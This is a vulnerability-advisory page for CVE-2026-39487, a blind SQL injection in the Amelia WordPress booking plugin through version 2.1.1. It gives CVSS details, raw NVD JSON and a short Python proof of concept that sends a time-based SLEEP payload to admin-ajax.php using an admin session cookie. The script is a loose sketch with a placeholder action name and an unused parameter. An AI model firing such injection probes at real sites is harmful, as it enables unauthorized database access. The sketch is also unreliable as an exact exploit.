Security Vulnerability Report
中文
CVE-2026-39487 CVSS 7.6 HIGH

CVE-2026-39487

Published: 2026-04-08 09:16:24
Last Modified: 2026-04-24 18:08:35

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ameliabooking Amelia ameliabooking allows Blind SQL Injection.This issue affects Amelia: from n/a through <= 2.1.1.

CVSS Details

CVSS Score
7.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Amelia <= 2.1.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-39487 (Blind SQL Injection) # This is a conceptual demonstration based on the vulnerability description. import requests import time TARGET_URL = "http://example.com/wp-admin/admin-ajax.php" COOKIE = { "wordpress_logged_in_xxx": "admin_session_cookie" } def check_sqli(payload): data = { "action": "amelia_action", "serviceId": f"1 AND IF(1=1, SLEEP(5), 0)" # Example payload } start_time = time.time() response = requests.post(TARGET_URL, data=data, cookies=COOKIE) end_time = time.time() if end_time - start_time > 5: return True return False if check_sqli("1=1"): print("[+] Vulnerability confirmed: Blind SQL Injection detected.") else: print("[-] Vulnerability not detected or patch applied.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39487", "sourceIdentifier": "[email protected]", "published": "2026-04-08T09:16:23.533", "lastModified": "2026-04-24T18:08:35.440", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ameliabooking Amelia ameliabooking allows Blind SQL Injection.This issue affects Amelia: from n/a through <= 2.1.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:L", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/ameliabooking/vulnerability/wordpress-amelia-plugin-2-1-1-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}